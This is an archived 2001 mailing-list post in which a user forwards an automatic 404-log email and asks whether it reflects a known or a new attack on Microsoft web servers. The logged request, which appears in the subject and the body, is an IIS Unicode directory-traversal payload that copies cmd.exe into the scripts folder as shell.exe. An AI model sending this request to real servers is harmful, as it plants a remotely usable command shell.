[UFO Chicago] New Attack Against MS Webservers?

[Nate Riffe]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I just got the email below from my 404.php script.  Does anyone know
whether this is another exploit of an already known bug or a new bug?

- -Nate

- ------------------------------------------------((\))<----------------------
Nate Riffe                 | PGP public key available at:
http://www.movealong.org/  | http://www.movealong.org/~inkblot/pgp-key.asc
inkblot@geocities.com      |
                           | Secure your email today!

- ---------- Forwarded message ----------
Date: Thu, 13 Sep 2001 08:39:33 -0500 (CDT)
From: www-data <www-data@movealong.dhs.org>
To: inkblot@maverick.inknet
Subject: 404 Not Found at
    /scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+c:\\winnt\\system32\\cmd.
    exe+c:\\inetpub\\scripts\\shell.exe

Hi Nate,

Hey, this is your 404.php script.  4.3.18.212 found a page that doesn't
exist at /scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+c:\\winnt\\system32\\cmd.exe+c:\\inetpub\\scripts\\shell.exe.  What a conundrum!

Regards,
404.php

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQA/AwUBO6C4W4jJNqeHAZR4EQJ+vACg3R0kIkPvFh3qLXy6M4pvp0JCgrMAoMNK
M2FnEfTp3HF7UVsBGI4kpXMR
=ZpEC
-----END PGP SIGNATURE-----